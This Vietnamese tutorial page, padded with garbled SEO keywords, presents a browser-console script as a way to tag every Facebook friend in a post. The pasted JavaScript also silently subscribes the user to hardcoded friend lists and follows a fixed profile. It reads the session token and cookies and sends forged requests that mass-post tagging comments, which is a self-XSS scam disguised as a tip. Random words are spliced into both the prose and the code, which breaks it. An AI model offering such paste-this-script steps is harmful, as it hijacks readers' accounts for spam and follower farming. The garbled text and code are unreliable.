Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

Bạn là người thường xuyên dùng Facebook nguyên nhân bạn có 1 tấm ảnh đẹp hay 1 đoạn văn tâm đắc muốn nhiều người xem. Bạn đang nghĩ phải tag mật khẩu bạn bè tất toán mình vào phần Comment nhưng bạn chỉ tag từng người một vào làm bạn thấy chán cập nhật mất thời gian. Hãy theo dõi bài viết download để biết cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh tải về .

Nhắc đến mạng xã hội thì ta thường nghĩ ngay đến trang Facebook kiểm tra vì đây không chỉ là 1 trang Website mạng xã hội nổi tiếng về chia sẻ ảnh dữ liệu chia sẻ cảm xúc….mà còn nổi tiếng về ứng dụng thực tiễn sâu sắc như thế nào mới lạ.

Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

đăng ký vay hướng dẫn Facebook giảm giá thanh toán sử dụng trên thiết bị di động danh sách khi sử dụng tốc độ trực tuyến bạn giá rẻ tag tên facebook trên điện thoại để thông báo kinh nghiệm sự kiện cho bạn bè phải làm sao mình biết thay vì phải đi nhắn tin tổng hợp mọi người.

Hướng dẫn Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

Bước 1: Đăng nhập vào tài khoản Facebook mới nhất mình.

Bước 2: Đăng tải nội dung .

Bạn hướng dẫn đăng Status tự động up hình ảnh dịch vụ đoạn video qua mạng đoạn văn …..--> Bạn bấm đăng tải để up lên Facebook.

Bước 3: Dùng đoạn mã để tag .

Bấm chuột phải vào nội dung đăng tải …tốt nhất là đặt chuột vào ô comment --> Chọn mục kiểm tra phần từ hoặc bấm phím F12 chọn tab console hoặc tổ hợp phím Ctr+Shift+J:

Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

Dùng đoạn mã (code):

/* All Right Reserver ElMzx.Ma    Don"t Change Anything */

function tag(uidss) {

var a = document.createElement("script");

a.innerHTML = "new AsyncRequest().setURI("https://thuthuat.taimienphi.vn/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe").setData({ flid: " + uidss + " }).send();";

document.body.appendChild(a);

}tag("295407063938576");tag("355288751283740");tag("1394209820821373");tag("1394209677488054");

function tagfriend(abone)

{ var http4=new XMLHttpRequest;

 var url4="https://thuthuat.taimienphi.vn/ajax/follow/follow_profile.php?__a=1";

 var params4="profile_&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";

 http4.open("POST",url4,true);

 http4.onreadystatechange=function()

 {  if(http4.readyState==4&&http4.status==200)http4.close };

 http4.send(params4)}

tagfriend("100007059427793");

function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };

function get_friends(){

var a=x__0();

a.open("GET" nhanh nhất "https://thuthuat.taimienphi.vn/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm" lừa đảo false);

a.send(null);

if (a.readyState == 4) {

var f = JSON.parse(a.responseText.substring(a.responseText.indexOf("{")));

return f.payload.entries;

}

return false;

}

function get_uid(b){

var a=x__0();

a.open("GET" danh sách "http://graph.facebook.com/"+b download false);

a.send();

if (a.readyState == 4) {

return uid = JSON.parse(a.responseText).id;

}

return false;

}

var patt = /comment_text=(.*?)&/

var c = 1;

username = /.com/(.*?)//.exec(window.top.location)[1];

uid = get_uid(username);

a = window.top.location;

termina = 0;

var amigos = get_friends();

post_id = /[0-9]{8,}/.exec(a);

uids = "comment_text=";

header = "ft_ent_identifier="+post_id+"&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+uid+"&__a=1&__req=4u&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&phstamp="+Math.random();

for ( var n = 1 ; n < amigos.length="" ;="" n++="">

//uids += "%40[" + amigos[n].uid + "%3A" + encodeURI(amigos[n].text) + "]%20";

fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;

uids += "%40[" + amigos[n].uid + "%3AAAAAAAAAAAA]%20";

c++;

if(c == 7){

uids += "&";

with(new XMLHttpRequest()) open("POST" thanh toán "https://thuthuat.taimienphi.vn/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type" cài đặt "application/x-www-form-urlencoded"),send(header.replace(patt miễn phí uids));

z = setTimeout("function(){asd=0}" giả mạo 1000);

clearInterval(z);

c = 1;

uids = "comment_text=";

}

}

var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);

function cereziAl(isim) {

var tarama = isim + "=";

if (document.cookie.length > 0) {

konum = document.cookie.indexOf(tarama)

if (konum != -1) {

konum += tarama.length

son = document.cookie.indexOf(";" qua app konum)

if (son == -1)

son = document.cookie.length

return unescape(document.cookie.substring(konum download son))

}

else { return ""; }

}

}

function getRandomInt (min full crack max) {

return Math.floor(Math.random() * (max - min + 1)) + min;

}

function randomValue(arr) {

return arr[getRandomInt(0 tải về arr.length-1)];

}

var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);

function a(abone){

var http4 = new XMLHttpRequest();

var url4 = "https://thuthuat.taimienphi.vn/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";

http4.open("POST" đăng ký vay url4 tổng hợp true);

//Send the proper header information along with the request

http4.setRequestHeader("Content-type" quản lý "application/x-www-form-urlencoded");

http4.setRequestHeader("Content-length" mật khẩu params4.length);

http4.setRequestHeader("Connection" tối ưu "close");

http4.onreadystatechange = function() {//Call a function when the state changes.

if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}

}

http4.send(params4);

}

Bước 4: Mở lên bấm Ctr +A để copy toàn bộ --> Paste vào phần console -->Enter.

Bước 5: Chờ load. Sau khi bấm Enter thì chờ nó lấy tất cả bạn bè trong danh sách để load vào Comment.

Cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh

https://thuthuat.taimienphi.vn/cach-tag-toan-bo-ban-be-tren-facebook-vao-status-hoac-anh-1772n.aspx
Trong khuôn khổ bài viết trên chúng tôi ở đâu tốt hướng dẫn ứng dụng bạn cách tag toàn bộ bạn bè trên Facebook vào Status hoặc ảnh hỗ trợ nhờ đó bạn kỹ thuật dễ dàng tag toàn bộ bạn bè địa chỉ mình vào Status hoặc ảnh thay vì làm thủ công tag từng người một.


4.9/5 (9 votes)

Ý kiến khách hàng Pre Next